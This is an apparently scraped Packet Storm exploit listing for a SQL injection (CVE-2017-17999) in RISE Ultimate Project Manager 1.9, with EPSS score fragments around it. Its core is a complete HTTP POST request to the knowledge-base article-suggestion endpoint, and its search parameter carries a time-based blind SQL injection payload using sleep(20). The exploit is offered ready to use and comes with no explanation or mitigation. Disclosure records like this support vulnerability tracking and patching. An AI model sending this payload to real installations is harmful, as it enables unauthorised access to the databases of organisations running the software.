Lucene search

K
packetstormAhmad MahfouzPACKETSTORM:145902
HistoryJan 15, 2018 - 12:00 a.m.

RISE 1.9 SQL Injection

2018-01-1500:00:00
Ahmad Mahfouz
packetstormsecurity.com
18

0.002 Low

EPSS

Percentile

56.7%

`# Exploit Title: RISE Ultimate Project Manager 1.9 - SQL Injection  
# Exploit Author: Ahmad Mahfouz   
# Contact: http://twitter.com/eln1x  
# Date: 30/12/2017  
# CVE: CVE-2017-17999  
# Vendor Homepage: http://fairsketch.com/  
# Version: 1.9  
  
  
  
  
  
POST /index.php/knowledge_base/get_article_suggestion/ HTTP/1.1  
Host: localhost  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 14  
Connection: close  
  
  
search=product'%20and%20(select*from(select(sleep(20)))a)--%20  
  
`

0.002 Low

EPSS

Percentile

56.7%